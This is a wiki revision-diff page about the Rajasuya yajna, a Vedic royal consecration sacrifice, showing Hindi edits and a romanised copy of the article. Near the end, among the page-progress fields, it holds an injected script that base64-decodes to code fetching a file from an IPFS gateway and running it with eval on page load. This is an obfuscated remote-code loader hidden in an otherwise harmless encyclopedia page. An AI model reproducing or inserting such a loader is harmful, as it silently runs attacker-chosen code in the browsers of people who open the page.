Difference between revisions of "राजसूय यज्ञ"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replacement - "पश्चात " to "पश्चात् ")
 
(6 intermediate revisions by 2 users not shown)
Line 1: Line 1:
*[[ऐतरेय ब्राह्मण]] इस यज्ञ के करने वाले महाराजों की सूची प्रस्तुत करता है, जिन्होंने अपने राज्यारोहण के पश्चात [[पृथ्वी देवी|पृथ्वी]] को जीता एवं इस [[यज्ञ]] को किया।  
+
[[चित्र:Rajasuya yajna.jpg|राजसूय यज्ञ में [[कृष्ण|श्रीकृष्ण]] का चरण पूजन |thumb]]
 +
*[[ऐतरेय ब्राह्मण]] इस यज्ञ के करने वाले महाराजों की सूची प्रस्तुत करता है, जिन्होंने अपने राज्यारोहण के पश्चात् [[पृथ्वी देवी|पृथ्वी]] को जीता एवं इस [[यज्ञ]] को किया।  
 
*राजसूय यज्ञ सम्राट का प्रमुख कर्तव्य समझा जाने लगा।  
 
*राजसूय यज्ञ सम्राट का प्रमुख कर्तव्य समझा जाने लगा।  
 
*जनता इसमें भाग लेने लगी एवं इसका पक्ष धार्मिक की अपेक्षा अधिक सामाजिक होता गया।  
 
*जनता इसमें भाग लेने लगी एवं इसका पक्ष धार्मिक की अपेक्षा अधिक सामाजिक होता गया।  
 
*राजसूय यज्ञ चक्रवर्ती राजा बनने के लिए किया जाता था।  
 
*राजसूय यज्ञ चक्रवर्ती राजा बनने के लिए किया जाता था।  
 
*[[ब्रह्मा]] ने पूर्वकाल में बड़े समारोह के साथ इस यज्ञ का अनुष्ठान किया था। उसी यज्ञ में [[दक्ष]] प्रजापति और [[शंकर]] में कलह मच गया था। ब्राह्मणों ने क्रोध में आकर नन्दी को शाप दिया था और नन्दी ने ब्राह्मणों को। यही कारण है कि भगवान शंकर ने दक्ष के यज्ञ को नष्ट कर डाला।
 
*[[ब्रह्मा]] ने पूर्वकाल में बड़े समारोह के साथ इस यज्ञ का अनुष्ठान किया था। उसी यज्ञ में [[दक्ष]] प्रजापति और [[शंकर]] में कलह मच गया था। ब्राह्मणों ने क्रोध में आकर नन्दी को शाप दिया था और नन्दी ने ब्राह्मणों को। यही कारण है कि भगवान शंकर ने दक्ष के यज्ञ को नष्ट कर डाला।
*पूर्वकाल में [[दक्ष]], धर्म, [[कश्यप]], [[शेषनाग]], [[कर्दममुनि]], [[स्वयंभुव मनु]], उनके पुत्र प्रियव्रत, [[शिव]], सनत्कुमार, [[कपिल]] तथा [[ध्रुव]] ने विष्णु यज्ञ किया था। उसके अनुष्ठान से हज़ारों '''राजसूय यज्ञों''' का फल निश्चित रूप से मिल जाता है।  
+
*पूर्वकाल में [[दक्ष]], धर्म, [[कश्यप]], [[शेषनाग]], कर्दममुनि, [[स्वयंभुव मनु]], उनके पुत्र प्रियव्रत, [[शिव]], सनत्कुमार, [[कपिल मुनि|कपिल]] तथा [[ध्रुव]] ने विष्णु यज्ञ किया था। उसके अनुष्ठान से हज़ारों '''राजसूय यज्ञों''' का फल निश्चित रूप से मिल जाता है।  
 
+
{{लेख प्रगति
 +
|आधार=
 +
|प्रारम्भिक= प्रारम्भिक1
 +
|माध्यमिक=
 +
|पूर्णता=
 +
|शोध=
 +
}}
 +
{{संदर्भ ग्रंथ}}
 +
==टीका टिप्पणी और संदर्भ==
 +
<references/>
 +
==संबंधित लेख==
 +
{{यज्ञ}}{{महाभारत}}
  
 
[[Category:पौराणिक कोश]]
 
[[Category:पौराणिक कोश]]

Latest revision as of 07:29, 7 November 2017

[[chitr:Rajasuya yajna.jpg|rajasooy yajn mean shrikrishna ka charan poojan |thumb]]

  • aitarey brahman is yajn ke karane vale maharajoan ki soochi prastut karata hai, jinhoanne apane rajyarohan ke pashchath prithvi ko jita evan is yajn ko kiya.
  • rajasooy yajn samrat ka pramukh kartavy samajha jane laga.
  • janata isamean bhag lene lagi evan isaka paksh dharmik ki apeksha adhik samajik hota gaya.
  • rajasooy yajn chakravarti raja banane ke lie kiya jata tha.
  • brahma ne poorvakal mean b de samaroh ke sath is yajn ka anushthan kiya tha. usi yajn mean daksh prajapati aur shankar mean kalah mach gaya tha. brahmanoan ne krodh mean akar nandi ko shap diya tha aur nandi ne brahmanoan ko. yahi karan hai ki bhagavan shankar ne daksh ke yajn ko nasht kar dala.
  • poorvakal mean daksh, dharm, kashyap, sheshanag, kardamamuni, svayanbhuv manu, unake putr priyavrat, shiv, sanatkumar, kapil tatha dhruv ne vishnu yajn kiya tha. usake anushthan se hazaroan rajasooy yajnoan ka phal nishchit roop se mil jata hai.
panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh

sanbandhit lekh